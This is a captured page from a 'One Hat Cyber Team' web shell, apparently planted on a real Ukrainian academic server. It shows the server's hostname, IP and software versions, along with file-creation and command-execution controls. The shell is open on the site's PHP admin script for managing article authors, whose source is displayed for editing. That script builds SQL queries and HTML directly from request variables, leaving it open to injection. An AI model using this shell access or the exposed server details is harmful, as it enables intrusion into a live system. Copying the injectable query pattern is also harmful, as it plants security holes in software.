One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
admin
/
Edit File:
add_remove_authors.php
<? $page_title="Add/Remove authors"; $related_page="manage_articles.php"; require("../auth/auth.php"); require("functions_admin.php"); $id_selected = take_variable("id_selected"); $lang=take_variable('lang'); if (!$id_selected) { //tell("No article specified","Не указан номер статьи","Невказано номер статті")."!"); header("Location: ".manage_articles()); } else { $current_author_id = take_variable("current_author_id"); $aa_browse_todo = take_variable("aa_browse_todo"); $aa_browse_selected = take_variable("aa_browse_selected"); $aa_add_selected = take_variable("aa_add_selected"); $aa_todo = take_variable("aa_todo"); $todo = take_variable("todo"); switch ($aa_browse_todo) { case "Accept": //mysql_query("SET NAMES '$charset'", $db_handle); mysql_query("DELETE FROM AA WHERE article_id='".$id_selected."'"); mysql_query("REPLACE INTO AA (author_id, article_id,author_ambition) select author_id, article_id, author_ambition from AA_temp WHERE article_id=".$id_selected); mysql_query("UPDATE Articles SET updated=now(),updated_by='".$current_author_id."' WHERE id=".$id_selected); header("Location: manage_articles_action.php?id_selected=$id_selected&todo=modify&lang=".$lang); break; case "Discard": header("Location: manage_articles_action.php?id_selected=$id_selected&todo=modify&lang=".$lang); break; case "Remove": //mysql_query("SET NAMES '$charset'", $db_handle); require("header.php"); if ($aa_browse_selected) { //echo "removing author $aa_browse_selected for article $id_selected"; $res_au_remove = mysql_db_query($_db, "DELETE FROM AA_temp WHERE article_id='".$id_selected."' AND author_id='".$aa_browse_selected."'"); } //if selected else echo "<DIV CLASS=alert><P ALIGN=center>No command specified!</p></div>"; // $aa_browse_todo="-1"; break; default: //echo "not remove"; require("header.php"); break; } //switch //mysql_query("SET NAMES '$charset'", $db_handle); //add authors (form) $res_au = mysql_query("SELECT id, last_name_$lang, first_name_$lang,middle_name_$lang, city_$lang, affiliation_$lang FROM Authors ORDER BY last_name_$lang,first_name_$lang, middle_name_$lang, city_$lang"); echo "<H1>".enruua("Selection of authors for article", "Выбор авторов для статьи", "Вибір авторів для статті")." ".number().space().article_edit_link($id_selected)."</h1>\n"; // echo "<P>".enruua("Select among the persons registered in the authors table in the order of appearence", "Выберите нужные записи из таблицы персоналий в том порядке, в котором указаны авторы данной статьи", "Виберіть потрібні записи з таблиці персоналій в тому порядку, в якому вказано авторів даної статті") .".</P>\n"; echo "<FIELDSET>\n "; echo "<LEGEND>\n"; echo enruua("Database of persons", "Банк данных персоналий", "Банк даних персоналій"); echo "</LEGEND>\n"; print("<FORM METHOD=\"POST\" ACTION=\"add_remove_authors.php\">\n"); echo "<INPUT TYPE=\"hidden\" NAME=\"lang\" value=\"".$lang."\">"; print("<INPUT TYPE=\"hidden\" NAME=\"id_selected\" value=\"".$id_selected."\">\n"); print("<p><INPUT TYPE=\"hidden\" NAME=\"todo\" value=\"".$todo."\"></p>\n"); echo "<P>\n"; //all the entries of the authors table (a menu) //echo "aa_add_selected=$aa_add_selected<br>\n"; echo "<SELECT NAME=\"aa_add_selected\" style=\"width: 100%;\">\n"; while($row = mysql_fetch_array($res_au)) { /* print("<OPTION VALUE=\"$row[id]\">".$row["last_name_$lang"].", ".$row["first_name_$lang"]." ".$row["middle_name_$lang"]." (".$row["city_$lang"]."), no. $row[id]</OPTION>\n"); */ echo "<OPTION VALUE=\"".$row["id"]."\">"; echo author_option_name($row)." (".number()." ".$row["id"].")"; echo "</OPTION>\n"; } echo "</SELECT></p>\n"; echo "<P>"; echo "<INPUT TYPE=hidden NAME=\"aa_todo\" VALUE=\"select\">"; echo "<INPUT id=add TYPE=\"submit\" NAME=foo value=\"".enruua("Add to the list of authors", "Внести в список авторов", "Додати до переліку авторів")."\">\n"; echo "</p>\n "; //if ($aa_add_selected) if (strtoupper($aa_todo) == "SELECT") { /* add an author */ /* echo "aa_add_selected=$aa_add_selected (author); id_selected=$id_selected (article)"; */ $res_aa_verify = mysql_query("SELECT id, author_id,article_id FROM AA_temp WHERE author_id='".$aa_add_selected."' AND article_id='".$id_selected."'"); //mysql_free_result; if ($q = mysql_fetch_array($res_aa_verify) ) { // echo " (Found id=$q[id], au_id=$q[author_id], art_id=$q[article_id]) "; } else { //echo "inserting"; // look for other authors ambitions $res_other = mysql_query("SELECT author_ambition FROM AA_temp WHERE article_id='".$id_selected."' ORDER BY author_ambition"); while ($other=mysql_fetch_array($res_other)) { //other while (list($key,$val) = each($other)) { $new_ambition=$val; /* echo "key=$key, val=$val"; */ } /* echo "amb= $new_ambition <br>"; */ }//other $new_ambition++; //echo "Inserting author `$aa_add_selected' for article `$id_selected'"; $res_aa_replace = mysql_db_query($_db, "INSERT INTO AA_temp (author_id,article_id,author_ambition) VALUES ('$aa_add_selected','$id_selected', '$new_ambition' )"); if (!$res_aa_replace) die(mysql_error()); //$aa_add_selected=0; echo "purged<br>"; } //inserting } print("</FORM>\n"); echo "</FIELDSET>\n"; // actions performed; can output the results //now actually list the authors //mysql_query("SET NAMES '$charset'", $db_handle); $res_aa_read = mysql_query("SELECT id,author_id, article_id,author_ambition FROM AA_temp WHERE article_id='".$id_selected."' ORDER BY author_ambition"); echo "<p>".enruua("The following authors are associated with article", "Следующие лица внесены в список авторов статьи", "Наступні особи внесено до списку авторів статті" ) ." ".number().space().article_edit_link($id_selected).":</p>"; echo "<FIELDSET>\n"; echo "<LEGEND>\n"; echo enruua("List of authors of article", "Список авторов статьи", "Перелік авторів статті").space().number().space().article_edit_link($id_selected); echo "</LEGEND>\n"; //browse authors print("<FORM METHOD=\"POST\" ACTION=\"add_remove_authors.php\">"); print("<input type=\"hidden\" NAME=\"id_selected\" value=\"".$id_selected."\">\n"); print("<input type=\"hidden\" NAME=\"todo\" value=\"$todo\">\n"); pass("todo_selected",$todo_selected); echo pass("lang",$lang); echo pass("current_author_id",$current_author_id); echo "<p>\n"; echo "<SELECT NAME=\"aa_browse_selected\" SIZE=4 STYLE=\"width: 100%;\">\n"; while ($row = mysql_fetch_array($res_aa_read)) { $res_au_read = mysql_db_query($_db, "select id, last_name_$lang, first_name_$lang,middle_name_$lang, city_$lang, affiliation_$lang from Authors WHERE id='".$row['author_id']."'"); if ($au_entry = mysql_fetch_array($res_au_read)) { echo "<option value=\"".$au_entry["id"]."\">"; echo author_option_name($au_entry)." (".number()." ".$au_entry["id"].")";; /* $res_check_AA = mysql_db_query($_db, "SELECT author_id, article_id FROM AA WHERE author_id='$au_entry[id]' AND article_id='$id_selected' "); if (!mysql_fetch_array($res_check_AA)) echo " [NOT SAVED]"; */ echo "</OPTION>\n"; } //$au_entry contains sth else echo "Authors table is incomplete: could not find authors with id='$row[author_id]'!"; } //row echo "</SELECT></P>\n"; echo "<P>"; echo "<INPUT TYPE=\"hidden\" NAME=aa_browse_todo value=\"Remove\">"; echo "<INPUT id=\"delete\" TYPE=\"submit\" NAME=foo value=\"" .enruua("Remove from the list of authors", "Убрать из списка авторов", "Забрати з переліку авторів")."\">\n"; //echo "<input type=\"submit\" NAME=aa_browse_todo value=\"Demote\">\n"; echo "</P>\n"; echo "</FORM>\n"; /* print("<input type=\"hidden\" NAME=\"id_selected\" value=\"$id_selected\">\n"); print("<input type=\"hidden\" NAME=\"todo\" value=\"$todo\">\n"); print("<input type=\"hidden\" NAME=aa_add_selected value=\"$aa_add_selected\">\n"); print("<input type=\"hidden\" NAME=\"aa_browse_selected\" value=\"$aa_browse_selected\">\n"); */ //echo "</form>"; echo "</FIELDSET>\n"; //echo "</DIV>"; echo "<div class=control>"; /*echo "<h2>".enruua("changing the author list for article", "Изменение списка авторов статьи","Зміна переліку авторів статті")." " .number().space().article_edit_link($id_selected,"")."</h2>\n";*/ echo "<p>".enruua("Please choose from the actions below", "Выберите, что делать","Виберіть, що зробити").":</p>\n"; echo "<FORM ACTION=\"add_remove_authors.php\" METHOD=\"post\">\n"; echo pass("id_selected",$id_selected); echo pass("current_author_id",$current_author_id); echo pass("lang",$lang); echo pass("todo",$todo); /* echo "<p><input type=radio NAME=aa_browse_todo value=\"Discard\"><font color=$alert_colour>".enruua("Discard changes", "Игнорировать сделанные изменения", "Ігнорувати зроблені зміни")."</font>\n"; echo "<p><input type=radio NAME=aa_browse_todo checked value=\"Accept\">".enruua("Accept changes","Сохранить изменения","Зберегти зроблені зміни")."\n";*/ echo "<p>\n"; echo "<SELECT NAME=\"aa_browse_todo\" id=\"thick_select\">\n"; echo "<OPTION VALUE=\"Discard\">" .enruua("Discard changes", "Игнорировать сделанные изменения", "Ігнорувати зроблені зміни")."</OPTION>\n"; echo "<OPTION SELECTED VALUE=\"Accept\">" .enruua("Accept the changes made", "Сохранить сделанные изменения", "Зберегти зроблені зміни")."</OPTION>\n"; echo "</SELECT>\n"; echo "<INPUT id=\"proceed_small\" type=\"submit\" value=\"" .enruua("Proceed", "Далее", "Далі")."\">"; echo "</p>"; echo "</form>\n"; echo "</div>\n"; } require ("footer.php"); ?>
Simpan